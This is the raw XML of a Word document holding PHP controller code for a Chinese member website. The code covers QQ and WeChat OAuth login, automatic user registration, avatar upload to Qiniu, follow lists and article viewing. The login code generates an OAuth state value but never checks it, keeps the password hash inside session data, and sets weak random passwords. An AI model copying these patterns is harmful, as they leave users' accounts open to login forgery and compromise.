    <w:p w14:paraId="16BAB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会员设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F41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B4C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$regmobile=$config['regmobile']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F3A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$regemail=$config['regemail']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E92E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$username=$regmobile.$regemail;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3E6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$this-&gt;assign('username',rtrim($username, "/"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BB9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$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29C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3D57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qqLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D8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request()-&gt;root(true).'/'.request()-&gt;path();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605298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$redirect_uri = urlencode($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3D5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$config=Db::name('member_config')-&gt;where('type','qqLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752C3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 $config['0']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11E7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$appsecret =  $config['1']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F46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$_SESSION['state'] = md5(uniqid(rand(), TRUE));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BB1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if(!isset($_GET['code']) &amp;&amp; !isset($_SESSION['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584305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'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E475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header('Location:'.$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FF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5040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94B8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(isset($_GET['code']) &amp;&amp; !isset($_SESSION['token'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CFE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$_SESSION['code'] = $_GET['code'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F4A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$url="https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B448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"&amp;client_secret=".$appsecret."&amp;code=".$_GET['code']."&amp;grant_type=authorization_code"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044556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."&amp;state=".$_SESSION['state']."&amp;redirect_uri=".$redirect_uri;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730ED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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA892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preg_match('/access_token=(.*?)\&amp;/', $res, $res);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501291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$access_token = $res[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D8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'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B2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$openid = file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E801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preg_match('/callback\((.*?)\)/', $openid, $openid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449ED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$openid = json_decode($openid['1'],true)['openid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA996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if($openid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC66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Db::name('member_band')-&gt;where(['code'=&gt;$openid])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17AC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A3140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$member=Db::name('member')-&gt;where(['id'=&gt;$db['uid'],'hide'=&gt;1])-&gt;field('id,password')-&gt;find(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FC1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C0035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"https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1916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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074A9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$res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A0B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$res=json_decode($res, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9DE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$member=$this-&gt;user(['openid'=&gt;$openid,'type'=&gt;'qqpc','nickname'=&gt;$res['nickname'],'img'=&gt;$res['figureurl_2'],'info'=&gt;$info]);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44276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EBCF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6C787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64549B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1CD49C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Db::name('member')-&gt;where('id',$member['id'])-&gt;update(['update_time'=&gt;$time,'update_ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381C1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_records($member['id'],'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC75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$data=$member['id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176D3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Session::set('user',_encrypt($data),'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269DE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header('Location:'.url('member/index'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E046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E0A3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$this-&gt;error('</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08058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2EB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89A9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$this-&gt;error('openid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A6A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67EA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41904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$this-&gt;error('code</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE6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414C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28A0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wxLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC06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request()-&gt;root(true).'/'.request()-&gt;path();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086D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urlencode($url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50899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$config=Db::name('member_config')-&gt;where('type','wxLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943F1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 $config['0']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9F0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$appsecret =  $config['1']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718C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$state = md5(uniqid(rand(), TRUE));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA349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if(!isset($_GET['code']) &amp;&amp; !isset($_SESSION['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EC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"https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C585A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header('Location:'.$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488B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C25A6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B66C3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(isset($_GET['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006059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"https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58C0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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D64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$res=json_decode($res, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EE8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if(isset($res['access_token']) &amp;&amp; isset($res['openid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19582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Db::name('member_band')-&gt;where(['code'=&gt;$res['openid']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5E4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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A58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ECD0F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$member=Db::name('member')-&gt;where(['id'=&gt;$db['uid'],'hide'=&gt;1])-&gt;field('id,password')-&gt;find(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6A2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E5278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"https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD96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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D0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$res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DF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$res=json_decode($res, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB85E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$member=$this-&gt;user(['openid'=&gt;$res['openid'],'type'=&gt;'wxpc','nickname'=&gt;$res['nickname'],'img'=&gt;$res['headimgurl'],'info'=&gt;$info,'unionid'=&gt;$res['unionid']]);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509A3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CAA8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42B5B7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50462F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2FAAB7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Db::name('member')-&gt;where('id',$member['id'])-&gt;update(['update_time'=&gt;$time,'update_ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434205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_records($member['id'],'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E461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$data=$member['id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127403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Session::set('user',_encrypt($data),'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A90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header('Location:'.url('member/index'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87B1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BE3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登录失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B8C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E5486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BCB11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$this-&gt;error('access_token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">openid </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18728A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2D54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1AD0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$this-&gt;error('code</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9E5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A7F5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7FB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user($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD36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28C234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3D556B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16D8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348B8F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$password=md5(rand(100000,999999));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD9D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$map['password']=$password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A26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$map['hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469254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76CCD8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$map['create_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A3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$map['update_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7184C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$map['update_ip']=$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A5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$map['nickname']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC46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$map['img']=$this-&gt;qiniu($data['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14F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$db=Db::name('member')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C19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E821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_records($db,'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B34C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$appidmap['uid']=$db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990C4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$appidmap['type']=$data['type'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0FB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$appidmap['code']=$data['openid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3004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$appidmap['time']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B02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$appidmap['info']=$data['info'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C86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$appidmapdb=Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D731A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_records($db,$data['type'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D12C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9633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['id'=&gt;$db,'password'=&gt;$password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3022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A97B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qiniu($url,$type='.jpg'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F290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if(!$url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288CF3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427798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121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2E5D7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537E9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3A578A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4B6A3A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455AE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$bmgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6396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469AD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md5($url.rand(11111,999999)) .$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6AF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$bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA1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76564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67B5D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739C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$key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93ED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FD78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0DAB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guanzhuList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70753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$pages=input('post.pages') ? input('post.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11C4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$type=input('param.type/d') ? input('param.type/d') : 1;     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D991E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$uid=input('param.uid/d') ? input('param.uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D26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4D2425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7EC46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7331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if(_token()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B2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_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F1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02AE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if($type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADAAC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$auid='a.gz_uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62134E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$where['a.uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBCD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4C1D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$auid='a.uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE99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$where['a.gz_uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4C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A51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0E872A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['__MEMBER__ w',$auid.'=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F12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23F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$data=Db::name('member_guanzhu')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;order('a.id desc')-&gt;field('w.id,w.img')-&gt;fetchSql(false)-&gt;paginate(15)-&gt;toarray(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402312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1C8F3E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$user=_user($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E643A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$data['data'][$k]['img']=_imgUrl().$user['img']."?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26272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$data['data'][$k]['username']=$user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F299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40F86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$data['data'][$k]['guanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$member['id'],'gz_uid'=&gt;$v['id']])-&gt;value('id'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150623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7CF4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BFE0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7F035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3244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C6EBB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F175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app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EABA4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app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB25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71684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48D796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Article extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B95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F6366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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73721E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7C03FA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if(_isMobileApp()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BBE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$this-&gt;redirect("m/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E34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2F5AA2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29DF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874E2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get($url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F5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$url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A3F9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729755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 = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBA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curl_setopt($curl,CURLOPT_URL,$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F12C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curl_setopt($curl,CURLOPT_POST,$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CE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curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88E4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curl_exec($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AFD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curl_close($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057357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4DFFC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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFEF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02C3B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29A685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$typeid=Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DC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676F07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$slide=Db::name('slide')-&gt;where('tid',1)-&gt;limit(6)-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E1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$this-&gt;assign('slide',$slide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93F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$this-&gt;assign('imgUrl',_imgUrl());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFFC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$this-&gt;fetch('suxiangw');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2936F2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10C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B798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if(!input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA954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参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14B0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B18E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18BB5B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$this-&gt;assign('typeidActive',$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A060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$this-&gt;assign('id',$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A129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0EC0A6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$where['id']=$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC348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$name=Db::name('typeid')-&gt;where($where)-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B844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251592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$typeid=Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47903B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0348CF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$this-&gt;fetch('list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F84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48DB8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view(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFAE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if(!input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC13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参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8F9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DBD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39503F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$name=Db::name('article')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A34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501A11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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132270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346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if(_session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A21B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_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8A0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if($name['uid'] &amp;&amp; $name['uid'] == $member['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B314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C340B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if($name['hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AAE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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3EC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}elseif($name['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494AA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文章正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0162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}elseif($name['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03235E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文章未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB5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2D2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7A52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CBF43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if($name['hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207ED5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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC036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}elseif($name['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35080E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文章正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D57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}elseif($name['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379C8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文章未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42179A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8A8E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8E4E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if($name['typeid']){</w:t>
      </w:r>
    </w:p>
